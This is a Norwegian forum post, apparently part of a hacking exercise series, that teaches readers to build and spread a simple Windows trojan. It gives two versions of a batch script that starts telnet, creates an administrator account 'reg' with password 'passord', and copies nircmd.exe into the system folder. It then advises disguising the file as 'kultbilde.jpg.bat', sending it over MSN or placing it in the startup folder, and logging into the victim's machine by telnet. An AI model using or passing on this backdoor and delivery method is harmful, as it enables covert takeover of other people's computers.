Først må æ bare si at det gikk ikke å ha alle øvelsene i samme post slik jeg hadde tenkt meg, pga at innlegget stenges for redigering etter 60 min.

I denne øvelsen skal vi ta for oss hvordan man lager en enkel trojane
og hvordan man bruker den. En trojane er et lite program som utgir seg
for å være noe annet enn den egentlig er, ofte så utgir den seg for å
være et godt program som skal fjerne virus og andre programmer fra
maskinen, og derfor godtar ofte brukeren programmet, når programmet
har kommet inn på maskinen og blitt godtatt så vil den begynne og åpne
porter og tjenester som gjør det muligt for andre i å komme inn på
maskinen.

For å komme oss inn på en datamaskin må man ha en tjeneste man kan
bruke, i denne øvelsen skal vi bruke telnet for å få «kontroll» over
maskinen. Og for at vi skal kunne bruke telnet så trenger vi å starte
telnet-tjenesten på den maskinen vi skal bruke.

Trojanen vi skal bruke er et lite batch script.

trojane.bat

Kode

echo off
cls
net start telnet
net user /add reg
net user reg passord
net localgroup administratorer /add reg
exit

Man kan også utvide denne trojanen slik at den kopierer nircmd.exe inn
i windows mappen. Nircmd er en videreutvikling av cmd som lar deg få
nye fuksjoner sånt som å skru av skjermen, åpne og lukke cdrommet,
kontrollere lyden på maskinen. Osv.
For å kopiere nircmd.exe inn i windows mappen så bruker vi kommandoen
xcopy ..\nircmd.exe %systemroot%

Kode

echo off
cls
net start telnet
xcopy ..\nircmd.exe %systemroot%
net user /add reg
net user reg passord
net localgroup administratorer /add reg
exit

Denne trojanen lager også en bruker som man kan bruke når man skal koble til med telnet.

En annen ide er å endre navnet på filen slik at den ikke heter
trojane.bat, for det er vel ikke så mange som vil godta en fil som
heter trojane? Kall den f.eks kultbilde.jpg.bat.

Det finnes mange måter å få denne filen inn på offeret sin maskin, man
kan enten sende den over MSN, eller man kan prøve å sette den i
oppstartsmappen, slik at når brukeren logger på så starter trojanen.
Når du er sikkert på at trojanen har kjørt på maskinen så trenger du
IP-adressen eller datamaskinnavnet til offeret, etter det kan du
starte opp telnet og koble til maskinen, det enkleste er å koble til
en maskin i samme nettverk, det på grunn av at hvis man skal koble til en maskin over internett så vil det ikke bare være å åpne telnet tjenesten men også telnet portene på modemet.

For å koble til med telnet så bruker du følgende kommando «telnet
IP/datamaskin navn». Du vil få spørsmål om brukernavn og passord. Brukernavnet er «reg» og passordet er «passord».

Her fra kan du utforske selv, hvis du ønsker hjelp kan du skrive «help», hvis du ønsker en liste over kommandoer i nircmd kan du besøke http://www.nirsoft.net/utils/nircmd.html

Linker
Nircmd download
Nircmd kommandoer
Trojansk hest - Wikipedia